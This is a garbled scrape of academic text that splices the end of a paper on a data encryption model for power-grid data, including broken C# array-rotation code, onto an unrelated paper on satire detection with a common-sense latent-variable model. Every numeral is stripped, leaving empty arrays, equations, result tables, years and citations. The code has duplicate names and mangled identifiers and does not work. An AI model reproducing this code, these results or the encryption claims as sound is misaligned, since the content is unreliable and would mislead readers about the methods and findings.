according to the sender to the time, location, variables and receiving time to time, location, and, according to the minimum level to the smallest unit according to position the label to the reverse calculation into pieces, and then pushing block reverse page to the model, and then push the page to the original data model. the process record of backward calculation is the decryption key. the above data encryption model is the data encryption model established based on the cubic dimension secret calculation model, which can be used to split and switch the top secret data multiple times. in addition, it is not only applicable to data, but also applicable to audio and image data. ) the programming language realizes the model construction idea of the encryption model  data type definition using system; using system.collections.generic; using system.linq; using system.text; namespace fatejudge.core.qm { public class qm data { public static int[] shunzhuan = new int[] { , , , , , , , }; public static int[] nizhuan = new int[] { , , , , , , , }; public static string[] jushu=new string[]{ " "," "," ", " "," "," ", " "," "," ", " "," "," ", international journal of advanced network, monitoring and controls volume , no. , " "," "," ", " "," "," ", " "," "," ", " "," "," "}; public static string qyyw=" public static string[] rpqm = new string[] { " }; public static string[] tianpanxingyuanwei = new string[] { }; public static string[] spqm = new string[] { }; public static string[] renpanxingzhuanxu = new string[] {}; public static string[] tianpanxingzhuanxu = new string[] { }; public static string[] shenpanzhuanxu = new string[] { };/ } }  data rotation public int getrpg (string yinyan, int zhishigong, string zhishi, string ren) { int ret = ; int n = getstringarrayindex(qmdata.rpxzx, ren);// - getstringarrayindex(qmdata. rpxzx, zs) + ) % ; int n = ; n = (getintarrayindex(qmdata.shunzhuan, zhishigong) + n) % ; ret = qmdata.shunzhuan[n ]; return ret; } public int getintarrayindex(int[] sa, int n) { int ret = ; for (int i = ; i < sa.length; i++) if (sa[i].equals(n)) { ret = i; break; } } return ret; } public string getpostrenpan(string zhishi, int zhishigong, int p) { string ret = string.empty; int n = ; int n = ; int n = ; n = (getintarrayindex(qmdata.shunzhuan, p) - getintarrayindex(qmd.shunzhuan, zhishigong) + ) % ; n = getstringarrayindex(qi=m=data. rpxzx, zhishi); n = ( + n + n ) % ; ret = qimendata. rpxzx [n ]; return ret; } iv. conclusion figure . data encryption model power data is the lifeblood of a country's economy and people's life. with the great development of internet of things, internet and ubiquitous electric internet of things, the security of data connection is particularly important. through the practice of the above data encryption model, the source information can be encrypted, which is different from several symmetric encryption algorithms and asymmetric encryption algorithms. this kind of model calculation can be encapsulated into ic or t card to form an encryption module, which is widely used in power inspection terminals, smart electricity meters and power big data cleaning applications, to increase the security means of data transmission, and to provide some enlightenment and reference for the data transmission encryption methods of power companies. international journal of advanced network, monitoring and controls volume , no. , reference [ ] song lei, luo qiliang, luo yi, tu guangyu. encryption scheme of real-time data communication in power system [j]. power system automation, ( ) [ ] liu gang, liang ye et al. realization and application of digital certificate technology in power secondary system [j]. power grid technology, , [ ] xingyuan wang,hongyu zhao,le feng,xiaolin ye,hao zhang. high-sensitivity image encryption algorithm with random diffusion based on dynamic-coupled map lattices[j]. optics and lasers in engineering, , . [ ] chen changqing. research on computer network communication intrusion prevention method based on data encryption technology [j]. information and computer (theoretical edition), ( ): - . [ ] doe/oak ridge national laboratory; ornl to take on nine power grid modernization projects as part of doe award[j]. newsrx health & science, . [ ] chen zhiguang. analysis and design of power project management system of state grid fuzhou power supply company [d]. yunnan university, . understanding satirical articles using common-sense dan goldwasser purdue university department of computer science dgoldwas@purdue.edu xiao zhang purdue university department of computer science zhang @purdue.edu abstract automatic satire detection is a subtle text clas- sification task, for machines and at times, even for humans. in this paper we argue that satire detection should be approached using common-sense inferences, rather than tradi- tional text classification methods. we present a highly structured latent variable model cap- turing the required inferences. the model ab- stracts over the specific entities appearing in the articles, grouping them into generalized categories, thus allowing the model to adapt to previously unseen situations. introduction satire is a writing technique for passing criticism using humor, irony or exaggeration. it is often used in contemporary politics to ridicule individual politicians, political parties or society as a whole. we restrict ourselves in this paper to such politi- cal satire articles, broadly defined as articles whose purpose is not to report real events, but rather to mock their subject matter. satirical writing often builds on real facts and expectations, pushed to ab- surdity to express humorous insights about the situ- ation. as a result, the difference between real and satirical articles can be subtle and often confusing to readers. with the recent rise of social media outlets, satirical articles have become increasingly popular and have famously fooled several leading news agencies . these misinterpretations can often https://newrepublic.com/article/ / satire-news-websites-are-cashing-gullible- outraged-readers vice president joe biden suddenly barged in, asking if anyone could “hook [him] up with a dixie cup” of their urine. “c’mon, you gotta help me get some clean whiz. shinseki, donovan, i’m looking in your direction” said biden. “do you want to hit this?” a man asked president barack obama in a bar in denver tuesday night. the president laughed but didn’t indulge. it wasn’t the only time obama was offered weed on his night out. figure : examples of real and satirical articles. top: satirical news excerpt. bottom: real news excerpt. be attributed to careless reading, as there is a clear line between unusual events finding their way to the news and satire, which intentionally places key po- litical figures in unlikely humorous scenarios. the two can be separated by carefully reading the arti- cles, exposing the satirical nature of the events de- scribed in such articles. in this paper we follow this intuition. we look into the satire detection task (burfoot and bald- win, ), predicting if a given news article is real or satirical, and suggest that this prediction task should be defined over common-sense inferences, rather than looking at it as a lexical text classifica- tion task (pang and lee, ; burfoot and bald- win, ), which bases the decision on word-level features. to further motivate this observation, consider the two excerpts in figure . both excerpts mention top-ranking politicians (the president and vice pres- ident) in a drug-related context, and contain infor- mal slang utterances, inappropriate for the subjects’ transactions of the association for computational linguistics, vol. , pp. – , . action editor: timothy baldwin. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. position. the difference between the two examples is apparent when analyzing the situation described in the two articles: the first example (top), de- scribes the vice president speaking inappropriately in a work setting, clearly an unrealistic situation. in the second (bottom) the president is spoken to inap- propriately, an unlikely, yet not unrealistic, situation. from the perspective of our prediction task, it is ad- visable to base the prediction on a structured repre- sentation capturing the events and their participants, described in the text. the absurdity of the situation described in satir- ical articles is often not unique to the specific in- dividuals appearing in the narrative. in our exam- ple, both politicians are interchangeable: placing the president in the situation described in the first ex- cerpt would not make it less absurd. it is therefore desirable to make a common-sense inference about high-ranking politicians in this scenario. we follow these intuitions and suggest a novel approach for the satire prediction task. our model, comsense, makes predictions by making common-sense inferences over a simplified narra- tive representation. similarly to prior work (cham- bers and jurafsky, ; goyal et al., ; wang and mcallester, ) we represent the narrative structure by capturing the main entities (and tracking their mentions throughout the text), their activities, and their utterances. the result of this process is a narrative representation graph (nrg). figure de- picts examples of this representation for the excerpts in figure . given an nrg, our model makes inferences quantifying how likely are each of the represented events and interactions to appear in a real, or satiri- cal context. annotating the nrg for such inferences is a challenging task, as the space of possible situa- tions is extremely large. instead, we frame the re- quired inferences as a highly-structured latent vari- able model, trained discriminatively as part of the prediction task. without explicit supervision, the model assigns categories to the nrg vertices (for example, by grouping politicians into a single cate- gory, or by grouping inappropriate slang utterances, regardless of specific word choice). these category assignments form the infrastructure for higher-level reasoning, as they allows the model to identify the commonalities between unrelated people, their ac- tions and their words. the model learns common- sense patterns leading to real or satirical decisions based on these categories. we express these pat- terns as parametrized rules (acting as global fea- tures in the prediction model), and base the predic- tion on their activation values. in our example, these rules can capture the combination of (epolitician) ∧ (qslang)→ satire, where epolitician and qslang are latent variable assignments to entity and utterance categories respectively. our experiments look into two variants of satire prediction: using full articles, and the more chal- lenging sub-task of predicting if a quote is real given its speaker. we use two datasets collected years apart. the first collected in (burfoot and bald- win, ) and an additional dataset collected re- cently. since satirical articles tend to focus on cur- rent events, the two datasets describe different peo- ple and world events. to demonstrate the robust- ness of our comsense approach we use the first dataset for training, and the second as out-of-domain test data. we compare comsense to several com- peting systems including a state-of-the-art convo- lutional neural network (kim, ). our experi- ments show that comsense outperforms all other models. most interestingly, it does so with a larger margin when tested over the out-of-domain dataset, demonstrating that it is more resistant to overfitting compared to other models. related work the problem of building computational models deal- ing with humor, satire, irony and sarcasm has at- tracted considerable interest in the the natural lan- guage processing (nlp) and machine learning (ml) communities in recent years (wallace et al., ; riloff et al., ; wallace et al., ; davi- dov et al., ; karoui et al., ; burfoot and baldwin, ; tepperman et al., ; gonzález- ibánez et al., ; lukin and walker, ; fi- latova, ; reyes et al., ). most work has looked into ironic expressions in shorter texts, such as tweets and forum comments. most related to our work is burfoot and baldwin ( ) which focused on satirical articles. in that work the authors sug- gest a text classification approach for satire detec- tion. in addition to using bag-of-words features, the authors also experiment with semantic validity fea- tures which pair entities mentioned in the article, thus capturing combinations unlikely to appear in a real context. this paper follows a similar intuition; however, it looks into structured representations of this information, and studies their advantages. our structured representation is related to several recent reading comprehension tasks (richardson et al., ; berant et al., ) and work on narrative representation such, as event-chains (chambers and jurafsky, ; chambers and jurafsky, ), plot- units (goyal et al., ; lehnert, ) and story intention graphs (elson, ). unlike these works, narrative representation is not the focus of this work, but rather provides the basis for making inferences, and as result we choose a simpler (and more ro- bust) representation, most closely resembling event chains (chambers and jurafsky, ) making common-sense inferences is one of the core missions of ai, applicable to a wide range of tasks. early work (reiter, ; mccarthy, ; hobbs et al., ) focused on logical inference, and manual construction of such knowledge repos- itories (lenat, ; liu and singh, ). more recently, several researchers have looked into au- tomatic common-sense knowledge construction and expansion using common-sense inferences (tandon et al., ; bordes et al., ; socher et al., ; angeli and manning, ). several works have looked into combining nlp with common- sense (gerber et al., ; gordon et al., ; lobue and yates, ; labutov and lipson, ; gordon et al., ). most relevant to our work is a semeval- task (gordon et al., ), looking into common-sense causality identification predic- tion. in this work we focus on a different task, satire detection in news articles. we argue that this task is inherently a common-sense reasoning task, as iden- tifying the satirical aspects in narrative text does not require any specialized training, but instead relies heavily on common expectations of normative be- havior and deviation from it in satirical text. we design our model to capture these behavioral expec- tations using (weighted) rules, instead of relying on lexical features as is often the case in text categoriza- tion tasks. other common-sense frameworks typi- cally build on existing knowledge bases represent- ?c?mon, you got t a hel p me get some cl ean whiz- shinseki, donovan, i ?m l ooking in your dir ect ion" mnr ar gument s and modi f i er s pr edi c at es ani mat e ent i t i es bar ge suddenl y quote ask vice pr esident joe biden (a) nrg for a satirical article tmpquote ask a man "do you want t o hit t his?" tuesday night bar in denver did not pr esident bar ack obama the pr esident coref ar gument s and modi f i er s pr edi c at es ani mat e ent i t i es loc laugh a a a i ndul ge a neg (b) nrg for a real article figure : narrative representation graph (nrg) for two article snippets ing world knowledge; however, specifying in ad- vance the behaviors commonly associated with peo- ple based on their background and situational con- text, to the extent it can provide good coverage for our task, requires considerable effort. instead, we suggest to learn this information from data directly, and our model learns jointly to predict and represent the satirical elements of the article. modeling given a news article, our comsense system first constructs a graph-based representation of the narrative, denoted narrative representation graph (nrg), capturing its participants, their actions and utterances. we describe this process in more de- tail in section . . based on the nrg, our model makes a set of inferences, mapping the nrg ver- tices to general categories abstracting over the spe- cific nrg. these abstractions are formulated as la- tent variables in our model. the system makes a prediction by reasoning over the abstract nrg, by decomposing it into paths, where each path captures a partial view of the abstract nrg. finally we asso- ciate the paths with the satire decision output. the comsense model then solves a global inference problem, formulated as an integer linear program (ilp) instance, looking for the most likely explana- tion of the satire prediction output, consistent with the extracted patterns. we explain this process in detail in section . . nrg abstraction as common-sense the main goal of the comsense approach is to move away from purely lexical models, and instead base its de- cisions on common-sense inferences. we formulate these inferences as parameterized rules, mapping el- ements of the narrative, represented using the nrg, to a classification decision. the rules’ ability to cap- ture common-sense inferences hinges on two key el- ements. first, the abstraction of nrg nodes into typed narrative elements allows the model to find commonalities across entities and their actions. this is done by associating each nrg node with a set of latent variables. second, constructing the decision rules according to the structure of the nrg graph allows us to model the dependencies between narra- tive elements. this is done by following the paths in the abstract nrg, generating rules by combining the latent variables representing nodes on the path, and associating them with a satire decision variable. computational considerations when setting up the learning system, there is a clear expressiv- ity/efficiency tradeoff over these two elements. in- creasing the number of latent variables associated with each nrg node would allow the model to learn a more nuanced representation. similarly, gener- ating rules by following longer nrg paths would allow the model to condition its satire decision on multiple entities and events jointly. the added expressivity does not come without price. given the limited supervision afforded to the model when learning these rules, additional expressivity would result in a more difficult learning problem which could lead to overfitting. our experiments demon- strate this tradeoff, and in figure we show the ef- fect of increasing the number of latent variables on performance. an additional concern with increas- ing the model’s expressivity is computational effi- ciency. satire prediction is formulated as an ilp inference process jointly assigning values to the la- tent variables and making the satire decision. since ilp is exponential in the number of variables, in- creasing the number of latent variables would be computationally challenging. in this paper we take a straight-forward approach to ensuring computa- tional tractability by limiting the length of nrg paths considered by our model to a constant size c= . assuming that we have m latent categories as- sociated with each node, each path would generate mc ilp variables (see section . for details), hence the importance of limiting the length of the path. in the future we intend to study approximate inference methods that can help alleviate this computational difficultly, such as using lp-approximation (martins et al., ). . narrative representation graph for news articles the narrative representation graph (nrg) is a sim- ple graph-based representation for narrative text, de- scribing the connections between entities and their actions. the key motivation behind nrg was to pro- vide the structure necessary for making inferences, and as a result we chose a simple representation that does not take into account cross-event relationships, and nuanced differences between some of the event argument types. while other representations (mani, ; goyal et al., ; elson, ) capture more information, they are harder to construct and more prone to error. we will look into adapting these models for our purpose in future work. since satirical articles tend to focus on political figures, we design the nrg around animate entities that drive the events described in the text, their ac- tions (represented as predicate nodes), their contex- tualizing information (location-modifiers, temporal modifiers, negations), and their utterances. we omit- ted from the graph other non-animate entity types. in figure we show an example of this representa- tion. similar in spirit to previous work (goyal et al., ; chambers and jurafsky, ), we represent the relations between the entities that appear in the story using a semantic role labeling system (pun- yakanok et al., ) and collapse all the entity men- tions into a single entity using a co-reference reso- lution system (manning et al., ). we attribute utterances to their speaker based on a previously published rule based system (o’keefe et al., ). formally, we construct a graph g = {v,e}, where v consists of three types of vertices: an- imate entity (e.g., people), predicate (e.g., actions) and argument (e.g., utterances, loca- tions). the edges e capture the relationships be- tween vertices. the graph contains several different edges. coref edges collapse the mentions of the same entity into a single entity, argument-type edges connect animate entity nodes to pred- icate nodes , and predicate nodes to argument nodes (modifiers). finally we add quote edges connecting animate entity nodes to utterances (argument). . satire prediction using the narrative representation graph satire prediction is inherently a text classification problem. such problems are often approached us- ing a bag-of-words (bow) model which ignores the document structure when making predictions. in- stead, the nrg provides a structured representation for making the satire prediction. we begin by show- ing how the nrg can be used directly and then dis- cuss how to enhance it by mapping the graph into abstract categories. directly using nrg for satire prediction we suggest a simple approach for extracting features di- rectly from the nrg, by decomposing it into graph paths, without mapping the graph into abstract cat- egories. this simple, word-based representation for prediction structured according to the nrg (denoted narrlex), generates features by using the words in the original document, corresponding to the graph decomposition. for example, consider the path con- necting “a man” to an utterance in figure (b). sim- ple features could associate the utterances words with that entity, rather than with the president. the resulting narrlex model generates bag-of-words features based on words corresponding to nrg path vertices, conditioned on their connected entity ver- tex. using common-sense for satire prediction un- like the narrlex model, which relies on directly these edges are typed according to their semantic roles. observed information, our comsense model per- forms inference over higher level patterns. in this model the prediction is a global inference process, taking into account the relationships between nrg elements (and their abstraction into categories) and the final prediction. this process is described in fig- ure . first, the model associates a high level category, that can be reused even when other, previously un- seen, entities are discussed in the text. we associate a set of boolean variables with each nrg vertex, capturing higher level abstraction over this node. we define three types of categories correspond- ing to the three types of vertices, and denote them e,a,q for entity category, action category and quote category, respectively. each category vari- able can take k different values. as a convention we denote x = i as category assignment, where x ∈ {e,a,q} is the category type, and i is its as- signment. since these category assignments are not directly observed, they are treated as latent variables in our model. this process is exemplified at the top right corner of figure . combinations of category assignments form pat- terns used for determining the prediction. these pat- terns can be viewed as parameterized rules. each weighted rule associates a combination with an out- put variable (satire or real). examples of such rules are provided in the middle of the right corner of figure . we formulate the activations of these rules as boolean variables, whose assignments are highly interconnected. for example, the variables representing the following rules (e = )→ satire and (e = )→ real are mutually exclusive, since assigning a t value to either one entails a satire (or real) prediction. to account for this interdepen- dency, we add constraints capturing the relations be- tween rules. the model makes predictions by combining the rule weights and predicting the top scoring output value. the prediction can be viewed as a derivation process, mapping article entities to categories (e.g., entity(“a man”)→ (e= ), is an example of such derivation), combinations of categories compose into prediction patterns (e.g., (e= )→satire). we use an ilp solver to find the optimal derivation se- quence. we describe the inference process as an in- teger linear program in the following section. "do you want t o hit t his?" quote a a man pr esident bar ak obama laugh ar gument s and modi f i er s pr edi c at es ani mat e ent i t i es e= q= a= e= commonsense pr edict ion rules lat ent cat egor y assignment s entity("a man") (e= ) entity("president barak obama") (e= ) predicate("laugh") (a= ) quote("do you want to hit this?") (q= ) (e= ) satire (e= ) satire (a= ) satire (q= ) satire (e= ) (a= ) satire (e= ) (q= ) satire (e= ) real (e= ) real (a= ) real (q= ) real (e= ) (a= ) real (e= ) (q= ) real figure : extracting common-sense prediction rules. . identifying relevant interactions using constrained optimization we formulate the decision as a - integer linear programming problem, consisting of three types of boolean variables: category assignments indicator variables, indicator variables for common-sense pat- terns, and finally the output decision variables. each indicator variable is also represented using a feature set, used to score its activation. . . category assignment variables each node in the nrg is assigned a set of com- peting variables, mapping the node to different cate- gories according to its type. • animate entity category variables, de- noted hi,j,e, indicating the entity category i for nrg vertex j. • action category variables, denoted hi,j,a, in- dicating the action category i for nrg vertex j. • quote category variables, denoted hi,j,q, in- dicating the quote category i for nrg vertex j. the number of possible categories for each vari- able type is a hyper-parameter of the model. variable activation constraints category as- signments to the same node are mutually exclusive (a node can only have a single category). we encode this fact by constraining the decision with a linear constraint (where x ∈{e,a,q}): ∀j ∑ i hi,j,x = . category assignment features each deci- sion variable decomposes into a set of features, φ(x,hi,j,x ) capturing the words associated with the j-th vertex, conditioned on x and i. . . common-sense patterns variables we represent common-sense prediction rules us- ing an additional set of boolean variables, connect- ing the category assignments variables with the out- put prediction. the space of possible variables is determined by decomposing the nrg into paths of size up to , and associating two boolean variables with category assignment variables corresponding to the vertices on these paths. one of the variables as- sociates the sequence of category assignment vari- ables with a real output value, and one with a satire output value. • single vertex path patterns variables, denoted by hbhi,j,x , indicating that the category assignment captured by hi,j,x is associated with output value b (where b∈{satire, real}). • two vertex path patterns variables, denoted by hb (hi,j,x ),(hk,l,x ) , indicating that the pattern cap- tured by category assignment along the nrg path of hi,j,x and hi,j,x is associated with output value b (where b∈{satire, real}). decision consistency constraints it is clear that the activation of the common-sense patterns vari- ables entails the activation of the category assign- ment variables, corresponding to the elements of the common-sense patterns. for readability we only write the constraint for the single vertex path vari- ables: (hbhi,j,x ) =⇒ (hi,j,x ). features similar to the category assignment variable features, each decision variable decom- poses into a set of features, φ(x,hbhi,j,x ). these fea- tures captures the words associated with each of the category assignment variables (in this example, the words associated with the j-th vertex) conditioned on the category assignments and the output predic- tion value (in this example, x, i and b). we also add a feature φ(hi,j,x,b) capturing the connection be- tween the output value b, and category assignment. . . satire prediction variables finally, we add two more boolean variables cor- responding to the output prediction: hsatire and hreal. the activation of these two variables is mu- tually exclusive, we encode that by adding the con- straint: hsatire + hreal = . we ensure the consistency of our model adding constraints forcing agreement between the final pre- diction variables, and the common-sense patterns variables: hbhi,j,x =⇒ h b. overall optimization function the boolean variables described in the previous section define a space of competing inferences. we find the optimal output value derivation by finding the optimal set of variables assignments, by solving the following objective: max y,h ∑ i hiw t φ(x,hi,y) s.t. c, ∀i; hi ∈{ , }, ( ) where hi ∈ h is the set of all variables defined above and c is the set of constraints defined over the activation of these variables. w is the weight vector, used to quantify the feature representation of each h, obtained using a feature function φ(·). note that the boolean variable acts as a - indi- cator variable. we formalize eq. ( ) as an ilp in- stance, which we solve using the highly optimized gurobi toolkit . http://www.gurobi.com/ parameter estimation for comsense the comsense approach models the decision as interactions between high-level categories of enti- ties, actions and utterances. however, the high level categories assigned to the nrg vertices are not ob- served, and as a result we view it as a weakly super- vised learning problem, where the category assign- ments correspond to latent variable assignments. we learn the parameters of these assignments by using a discriminative latent structure learning framework. the training data is a collection d ={(xi,yi)}ni= , where xi is an article, parsed into an nrg representation, and y is a binary label, indicating if the article is satirical or real. given this data we estimate the models’ parame- ters by minimizing the following objective function. ld(w) = min w λ ||w|| + n n∑ i= ξi ( ) ξi is the slack variable, capturing the margin vio- lation penalty for a given training example, and de- fined as follows: ξi = max y,h f(x,h,y,w) + cost(y,yi) − max h f(x,h,yi,w), where f(·) is a scoring function, similar to the one used in eq. . the cost function is the margin that the true prediction must exceed over the competing label, and it is simply defined as the difference be- tween the model prediction and the gold label. this formulation is an extension of the hinge loss for la- tent structure svm. λ is the regularization parame- ter controlling the tradeoff between the l regularizer and the slack penalty. we optimize this objective using the stochastic sub-gradient descent algorithm (ratliff et al., ; felzenszwalb et al., ). we can compute the sub- gradient as follows: ∇ld(w) = λw + n∑ i= Φ(xi,yi,y ∗) Φ(xi,yi,y ∗) = φ(xi,h ∗,yi) −φ(xi,h∗,y∗), where φ(xi,h∗,y∗) is the set of features represent- ing the solution obtained after solving eq. and modified to accommodate the margin constraint making a prediction. φ(xi,h∗,yi) is the set of fea- tures representing the solution obtained by solving eq. while fixing the outcome of the inference pro- cess to the correct prediction (i.e., yi). intuitively, it can be considered as finding the best explanation for the correct label using the latent variables h. in the stochastic version of the sub gradient de- scent algorithm we approximate ∇ld(w) by com- puting the sub gradient of a single example and mak- ing a local update. this version resembles the latent- structure perceptron algorithm (sun et al., ). we repeatedly iterate over the training examples and for each example, if the current w leads to a correct prediction (and satisfies the margin constraint), we only shrink w according to λ. if the model makes an incorrect prediction, the model is updated according Φ(xi,yi,y ∗). the optimization objective ld(w) is not convex, and the optimization procedure is guar- anteed to converge to a local minimum. empirical study we design our experimental evaluation to help clar- ify several questions. first, we want to understand how our model compares with traditional text classi- fication models. we hypothesize that these methods are more susceptible to overfitting, and design our experiments accordingly. we compare the models’ performance when using in-domain data (test and training data are from the same source), and out-of- domain data, where the test data is collected from a different source. we look into two tasks. one is the satire detection task (burfoot and baldwin, ). we also introduce a new task, called “did i say that?” which only focuses on utterances and speakers. the second aspect of our evaluation focuses on the common-sense inferences learned by our model. we examine how the size of the set of categories impacts the model performance. we also provide a qualitative analysis of the learned categories us- ing a heat map, capturing the activation strength of learned inferences over the training data. prediction tasks we look into two prediction tasks: ( ) satire detection (denoted sd), a binary classification task, in which the model has access to the complete article ( ) “did i say that?” (denoted dist), a binary classification task, consisting only of entities mentions (and their surrounding context in text) and direct quotes. the goal of the dist is to predict if a given utterance is likely to be real, given its speaker. since not all document contain di- rect quotes, we only use a subset of the documents in the sd task. datasets in both prediction tasks we look into two settings: ( ) in-domain prediction: where the training and test data are collected from the same source, and ( ) out-of-domain prediction, where the test data is collected from a different source. we use the data collected by burfoot and baldwin ( ) for training the model in both settings, and its test data for in-domain prediction (denoted train - sd’ , test - sd’ , train - sd’ - dist, test - sd’ - dist, respectively for training and testing in the sd and dist tasks). in addition, we collected a second dataset of satirical and real articles (de- noted sd’ ). this collection of articles contains real articles from cnn.com and satirical articles from theonion.com, a well known satirical news website. the articles were published between to , appearing in the political sections of both news web- sites. following other work in the field, all datasets are highly skewed toward the negative class (real ar- ticles), as it better characterizes a realistic prediction scenario. the statistics of the datasets are summa- rized in table . evaluated systems we compare several systems, as follows: system allpos always predict satire bb’ results by (burfoot and baldwin, ) conv convolutional nn. we followed (kim, ), using pre-trained -dimensional word vectors (mikolov et al., ). lex svm with unigram (lexu ) or both uni- gram and bigram (lexu+b ) features narrlex svm with direct nrg-based features (see sec . ) comsense our model. we denote the full model as comsensef , and comsenseq when us- ing only the entity+quotes based patterns. we tuned all the models’ hyper-parameters by us- ing a small validation set, consisting of % of the training data. after setting the hyper-parameters, the model was retrained using the entire dataset. we used svm-light to train our lexical baseline sys- tems (lex and narrlex). since the data is highly skewed towards the negative class (real), we ad- just the learner objective function cost factor for pos- itive examples to outweigh negative examples. the cost factor was tuned using the validation set. . experimental results since our goal is to identify satirical articles, given significantly more real articles, we report the f- measure of the positive class. the results are sum- marized in tables and . we can see that in all cases the comsense model obtains the best results. we note that in both tasks, when learning in the out- of-domain settings performance drops sharply, how- ever the gap between the comsense model and other models increases in these settings, showing that it is less prone to overfitting. interestingly, for the satire detection (sd) task, the comsenseq model performs best for the in- domain setting, and comsensef gives the best per- formance in the out-of-domain settings. we hypoth- esize that this is due to a phenomenon we call “over- fitting to document structure”. lexical models tend to base the decision on word choices specific to the training data, and as a result when tested on out of domain data, which describes new events and enti- ties, performance drops sharply. instead, the com- senseq model focuses on properties of quotations and entities appearing in the text. in the sd’ datasets, this information helps focus the learner, as the real and satire articles are structured differ- ently (for example, satire articles frequently contain multiple quotes). this structure is not maintained when working with out-of-domain data, and indeed in these settings the model benefits from using addi- tional information offered by the full model. number of latent categories our com- sense model is parametrized with the number of latent categories it considers for each entity, predicate and quote. this hyper-parameter can have a strong influence on the model performance (and running time). increasing it adds to the model’s expressivity allowing it to learn more complex patterns, but also defines a more complex learning http://svmlight.joachims.org/ . . . . . . ev= ev= ev= ev= ev= ev= lexlex quote vars f - s co re figure : different number of latent categories. ev de- notes the number entity categories used, and quotevars denotes the number of quote categories used. problem (recall our non-convex learning objective function). we focused on the dist task when evaluating different configurations as it converged much faster than the full model. figure plots the model behavior when using different numbers of latent categories. interestingly, the number of entity categories saturates faster than the number of quote categories. this can be attributed to the limited text describing entities. visualizing latent comsense patterns given the assignment to latent categories, our model learns common-sense patterns for identifying satirical and real articles based on these categories. ideally, these patterns could be extracted directly from the data, however providing the resources for this additional prediction task is not straightforward. instead, we view the category assignment as latent variables, which raises the question - what are the categories learned by the model? in this section we provide a qualitative evaluation of these categories and the prediction rules identified by the system using the heat map in figure . for simplicity, we focus on the dist task, which only has categories corresponding to entities and quotes. (a) prediction rules these patterns are expressed as rules, mapping category assignments to output values. in the dist task, we consider combinations of entity and quote category pairs, denoted ei,qj, in the heat map. the top part of figure , in red, shows the activation strength of each of the category com- task: sd indomain (sd’ +sd’ ) outdomain (sd’ +sd’ ) p r f p r f allpos . . . . bb’ . . . - - - conv . . . . . . lexu . . . . . . lexu+b . . . . . . narrlex . . . . . . comsenseq . . . . . . comsensef . . . . . . table : results for the sd task e , q e , q e , q e , q e , q e , q e , q e , q e , q e , q e , q e , q satire rule rule real activation activation quote topics activation entity topics activation satire profanity president real satire drugs liberal real satire polite conserva- real tive satire science annony- real mous satire legal politics real satire politics speaker real satire contro- law enfo- real versy rcement figure : visualization of the categories learned by the models. color coding capture the activation strength of manually constructed topical word groups, according to each latent category. darker colors indicate higher values. ei (qi), indicates an entity (quote) variable assigned the i-th category. data real satire train - sd’ test - sd’ test - sd’ train - sd’ - dist test - sd’ - dist test - sd’ - dist table : datasets statistics. binations when making predictions over the train- ing data. darker colors correspond to larger values, which were computed as: cell(ce,cq,b) = ∑ j hb (hce,j,e),(hcq,j,q) ∑ j,k,l hb (hk,j,e),(hl,j,q) intuitively, each cell value in figure is the number of times each category pattern appeared in real or satire output predictions, normalized by the over- all number of pattern activations for each output. we assume that different patterns will be associ- ated with satirical and real articles, and indeed we can see that most entities and quotes appearing in real articles fall into a distinctive category pattern, e ,q . interestingly, there is some overlap between the two predictions in the most active satire cate- gory (e ,q ). we hypothesize that this is due to the fact that the two article types have some overlap. (b) associating topic words with learned cate- gories in order to understand the entity and quote categories emerging from the training phase, we look at the activation strength of each category pat- tern with respect to a set of topic words. we manu- ally identified a set of entity types and quote topics, which are likely to appear in political articles. we associate a list of words with each one of these types. task: dist indomain (dist’ +dist’ ) outdomain (dist’ +dist’ ) p r f p r f allpos . . . . lexu . . . . . . comsenseq . . . . . . table : results for the dist task for example, the entity topic president was asso- ciated with words such as president, vice-president, obama, biden, bush, clinton. similarly, we associ- ated with the quote topic profanity a list of pro- fanity words. we associate types with quote cate- gories corresponding to style and topic, namely pro- fanity, drugs, politeness, science, legal, politics, controversy, and another set of seven types with entity types, namely president, liberal, conserva- tive, anonymous, politics, speaker, law enforce- ment. in the bottom left part of figure (in blue), we show the activation strength of each category with respect to the set of selected quote topics. intu- itively, we count the number of times the words as- sociated with a given topic appeared in the text span corresponding to a category assignment pair, sepa- rately for each output prediction. we normalize this value by the total number of topic word occurrences, over all category assignment pairs. note that we only look at the text span corresponding to quote vertices in the nrg. we provide a similar analysis for entity categories in the bottom right part of fig- ure (in green). we show the activation strength of each category with respect to the set of selected entity topic words. as can be expected, we can see that profanity words are only associated with satir- ical categories, and even more interestingly, when words appear in both satirical and real predictions, they tend to fall into different categories. for ex- ample, the topic words related to drugs can ap- pear both in real articles discussing alcohol and drug policies. but topic words related to drugs also ap- pear in satirical articles portraying politicians using these substances. while these are only qualitative results, we believe they provide strong intuitions for future work, especially considering the fact that the activation values do not rely on direct supervision, and only reflect the common-sense patterns emerg- ing from the learned model. summary and future work in this paper we presented a latent variable model for satire detection. we followed the observation that satire detection is inherently a semantic task and modeled the common-sense inferences required for it using a latent variable framework. we designed our experiments specifically to ex- amine if our model can generalize better than un- structured lexical models by testing it on out-of- domain data. our experiments show that in these challenging settings, the performance gap between our approach and the unstructured models increases, demonstrating the effectiveness of our approach. in this paper we restricted ourselves to limited narrative representation. in the future we intend to study how to extend this representation to capture more nuanced information. learning common-sense representation for pre- diction problems has considerable potential for nlp applications. as the nlp community considers in- creasingly challenging tasks focusing on semantic and pragmatic aspects, the importance of finding such common-sense representation will increase. in this paper we demonstrated the potential of common-sense representations for one application. we hope these results will serve as a starting point for other studies in this direction. references gabor angeli and christopher d manning. . nat- uralli: natural logic inference for common sense rea- soning. in proc. of the conference on empirical meth- ods for natural language processing (emnlp). jonathan berant, vivek srikumar, pei-chun chen, abby vander linden, brittany harding, brad huang, peter clark, and christopher d. manning. . model- ing biological processes for reading comprehension. in proc. of the conference on empirical methods for natural language processing (emnlp). antoine bordes, jason weston, ronan collobert, and yoshua bengio. . learning structured embed- dings of knowledge bases. in proc. of the national conference on artificial intelligence (aaai). clint burfoot and timothy baldwin. . automatic satire detection: are you having a laugh? in proc. of the annual meeting of the association computational linguistics (acl). nathanael chambers and dan jurafsky. . unsuper- vised learning of narrative event chains. in proc. of the annual meeting of the association computational linguistics (acl). nathanael chambers and dan jurafsky. . unsuper- vised learning of narrative schemas and their partici- pants. in proc. of the annual meeting of the associa- tion computational linguistics (acl). dmitry davidov, oren tsur, and ari rappoport. . semi-supervised recognition of sarcastic sentences in twitter and amazon. in proc. of the annual confer- ence on computational natural language learning (conll). david k elson. . dramabank: annotating agency in narrative discourse. in proc. of the international conference on language resources and evaluation (lrec). p. f. felzenszwalb, r. b. girshick, d. mcallester, and d. ramanan. 